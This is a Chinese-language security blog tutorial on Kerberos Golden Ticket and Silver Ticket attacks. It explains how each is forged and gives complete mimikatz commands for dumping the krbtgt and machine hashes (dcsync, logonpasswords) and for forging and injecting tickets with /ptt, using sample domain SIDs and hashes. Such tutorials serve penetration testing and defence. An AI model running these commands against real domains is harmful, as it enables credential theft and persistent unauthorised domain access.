Kerberos协议之黄金票据和白银票据

Golden Ticket(黄金票据)

在AS_REQ & AS_REP中,用户使用自身hash加密时间戳发送给KDC,KDC验证成功后返回用krbtgt hash加密的TGT票据。如果我们有krbtgt的hash,就可以自己给自己签发任意用户的tgt票据。

那么如果获取到了krbtgt的密码hash值,是不是就可以伪造任意tgt了。因为krbtgt只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门

制作黄金票据的前提条件

  • 1、krbtgt用户的hash(就意味着你已经有域控制器权限了) cbcede6976ded273667a8e574a17092f
  • 2、域名称 secice.cn
  • 3、域的SID值 S-1-5-21-1431134449-3516206009-3475222595
  • 4、要伪造的用户名(可以是任意用户甚至是不存在的用户)

黄金票据利用

先登录域控制器,dump krbtgt用户的hash值,获取域sid:

mimikatz # lsadump::dcsync /domain:secice.cn /user:krbtgt	//导出 krbtgt 密码 hash
也可以
mimikatz.exe "lsadump::dcsync /domain:secice.cn /user:krbtgt" exit >> 1.txt	//将导出的信息保存在1.txt中

黄金票据利用

切换到普通域用户的机器,生成TGT凭证,用户名随意:

mimikatz # kerberos::golden /domain:secice.cn /sid:S-1-5-21-1431134449-3516206009-3475222595 /rc4:cbcede6976ded273667a8e574a17092f /user:aaa /ptt
也可以
mimikatz.exe "kerberos::golden /domain:secice.cn /sid:S-1-5-21-1431134449-3516206009-3475222595 /rc4:cbcede6976ded273667a8e574a17092f /user:aaa /ptt" "kerberos::list" exit

黄金票据利用

注:普通黄金票据不能跨域使用;TGT 有效时间为 20 分钟;。分钟;。

Silver Ticket(白银票据)

白银票据是出现在TGS_REQ & TGS_REP过程中的。在TGS_REP中,不管Client是否有权限访问特殊服务,只要Client发送的TGT票据是正确的,那么就会返回服务hash加密的tgs票据。如果我们有了服务hash,就可以签发tgs票据。

伪造白银票据的前提条件

  • 1、域名称 secice.cn
  • 2、域的 SID S-1-5-21-1431134449-3516206009-3475222595
  • 3、域的服务账号的密码 hash f4bf5c36403ccc692e0bc5cf7f82a72a
  • 4、伪造的用户名(可以是任意的)

白银票据这里只是对单一的服务进行授权,利用过程和golden ticket差不多,首先上域控制器中,把机器的ntlm hash(rc4加密) dump下来,然后在普通域用户机器进行伪造权限,进行ptt.

白银票据利用

首先登录域控,dump机器hash

privilege::debug

sekurlsa::logonpasswords

也可以

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >> 1.txt

白银票据利用

将hash和SID保存下来,在普通域用户机器中进行ptt(在黄金票据中我们可以不指定 target 和 service,但是在白银票据中必须指定 target 和 service)

mimikatz.exe privilege::debug "kerberos::golden /domain:secice.cn /sid:S-1-5-21-1431134449-3516206009-3475222595 /target:DC.secice.cn /service:cifs /rc4:f4bf5c36403ccc692e0bc5cf7f82a72a /user:aaa /ptt" exit

白银票据利用

这里的cifs是指的文件共享服务,有了cifs服务权限,就可以访问域控制器的文件系统:

白银票据利用

不仅仅是cifs服务还有其他:

白银票据利用

ldap可以用来dcsync

两者区别

  1. 访问权限不同
    Golden Ticket: 伪造 TGT,可以获取任何 Kerberos 服务权限
    Silver Ticket: 伪造 TGS,只能访问指定的服务
  2. 加密方式不同
    Golden Ticket 由 krbtgt 的 Hash 加密
    Silver Ticket 由服务账号(通常为计算机账户)Hash 加密
  3. 认证流程不同
    Golden Ticket 的利用过程需要访问域控,而 Silver Ticket 不需要

本文作者: iceH
本文链接: http://www.secice.cn/p/737303c7
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!